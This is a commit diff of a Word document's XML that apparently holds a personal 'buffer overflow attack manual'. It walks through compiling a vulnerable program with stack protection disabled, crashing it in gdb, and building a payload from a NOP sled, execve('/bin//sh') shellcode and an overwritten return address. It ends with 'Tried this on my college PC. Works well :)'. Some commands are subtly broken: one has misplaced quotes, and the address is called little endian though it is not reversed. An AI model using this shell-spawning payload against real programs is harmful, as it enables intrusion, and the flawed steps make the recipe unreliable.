<commit_message>
complete buffer overflow attack manual
</commit_message>
<xml_diff>
--- a/Buffer_Overflow_Exploit.docx
+++ b/Buffer_Overflow_Exploit.docx
@@ -9,15 +9,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Title:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">Buffer Over Flow Attack/Exploit </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>Manual</w:t>
+        <w:t>Title:Buffer Over Flow Attack/Exploit Manual</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -54,7 +46,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -76,7 +68,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -199,7 +191,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -248,7 +240,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -289,7 +281,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -422,7 +414,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -444,7 +436,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -864,7 +856,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -900,7 +892,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -922,66 +914,26 @@
         <w:rPr>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t xml:space="preserve"> run $(python3 -c ' </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>print(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>"\x41" * 506</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>(gdb) run $(python3 -c '"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>(print</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>\x41" * 506</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>')</w:t>
+        <w:t xml:space="preserve"> run $(python3 -c ' print("\x41" * 506)')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>(gdb) run $(python3 -c '"(print\x41" * 506)')</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1011,23 +963,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Starting program: /home/shiv/Academic/timepass/vuln $(python3 -c '</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>print(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>"\x41" * 506</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>')</w:t>
+        <w:t>Starting program: /home/shiv/Academic/timepass/vuln $(python3 -c 'print("\x41" * 506)')</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1089,7 +1025,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -1139,13 +1075,7 @@
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>gcc -g -fno-stack-protector vuln.c -o vuln</w:t>
+        <w:t>$gcc -g -fno-stack-protector vuln.c -o vuln</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1161,7 +1091,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -1183,15 +1113,7 @@
       </w:r>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">” </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>disables gcc’s stack protection and doesn’t abort the code. So here is what happens when you  run the script again:</w:t>
+        <w:t xml:space="preserve"> ” disables gcc’s stack protection and doesn’t abort the code. So here is what happens when you  run the script again:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1211,23 +1133,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Starting program: /home/shiv/Academic/timepass/vuln $(python3 -c '</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>print(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>"\x41" * 506</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>')</w:t>
+        <w:t>Starting program: /home/shiv/Academic/timepass/vuln $(python3 -c 'print("\x41" * 506)')</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1271,7 +1177,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -1289,11 +1195,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">We get a segmentation fault. That is exactly what I need. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>This means that the gdb no longer gives me stack smashing message and aborts the code.</w:t>
+        <w:t>We get a segmentation fault. That is exactly what I need. This means that the gdb no longer gives me stack smashing message and aborts the code.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1433,7 +1335,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -1832,7 +1734,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -2261,7 +2163,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -2389,15 +2291,7 @@
       </w:r>
       <w:r>
         <w:rPr/>
-        <w:t>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>”</w:t>
+        <w:t>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2423,7 +2317,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -2488,7 +2382,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
-          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
@@ -2922,75 +2816,131 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:pBdr>
+          <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000001"/>
+        </w:pBdr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---Quit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Now pick any mid location to inject malicious code! Say 0x7fffffffdd0a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>So now, we convert the address to little endian make shit go crazy i.e. “</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="__DdeLink__640_276266283"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>\x7f\xff\xff\xff\xdd\x0a</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>” (reverse it)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Now, simply put this in the gdb:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>run $(python3 -c ‘print(“\x90”*540 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” + “\x7f\xff\xff\xff\xdd\x0a” * 10)’)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>you obviously have to adjust the values such that the last 60 padding bytes overwrite the return pointer on the stack. Then the ip will redirect to that memory location and slide down to the malicious code that will cause the hack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:pBdr>
           <w:bottom w:val="single" w:sz="2" w:space="2" w:color="000000"/>
         </w:pBdr>
         <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---Quit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">Now pick any mid location to inject malicious code! Say </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>0x7fffffffdd0a</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>So now, we convert the address to little endian make shit go crazy i.e. “\x7f\xff\xff\xff\xdd\x0a” (reverse it)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>my case: 7fffffffdcfa</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>To be contiued</w:t>
+        <w:t>Tried this on my college PC. Works well :)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -3009,6 +2959,7 @@
       <w:pgNumType w:fmt="decimal"/>
       <w:formProt w:val="false"/>
       <w:textDirection w:val="lrTb"/>
+      <w:docGrid w:type="default" w:linePitch="100" w:charSpace="0"/>
     </w:sectPr>
   </w:body>
 </w:document>
@@ -3021,15 +2972,12 @@
       <w:rPr>
         <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Sans CJK SC Regular" w:cs="Lohit Devanagari"/>
         <w:kern w:val="2"/>
-        <w:sz w:val="24"/>
         <w:szCs w:val="24"/>
         <w:lang w:val="en-IN" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault>
-      <w:pPr>
-        <w:widowControl/>
-      </w:pPr>
+      <w:pPr/>
     </w:pPrDefault>
   </w:docDefaults>
   <w:style w:type="paragraph" w:styleId="Normal">
@@ -3037,10 +2985,12 @@
     <w:qFormat/>
     <w:pPr>
       <w:widowControl/>
+      <w:bidi w:val="0"/>
+      <w:jc w:val="left"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Sans CJK SC Regular" w:cs="Lohit Devanagari"/>
-      <w:color w:val="auto"/>
+      <w:color w:val="00000A"/>
       <w:kern w:val="2"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>

</xml_diff>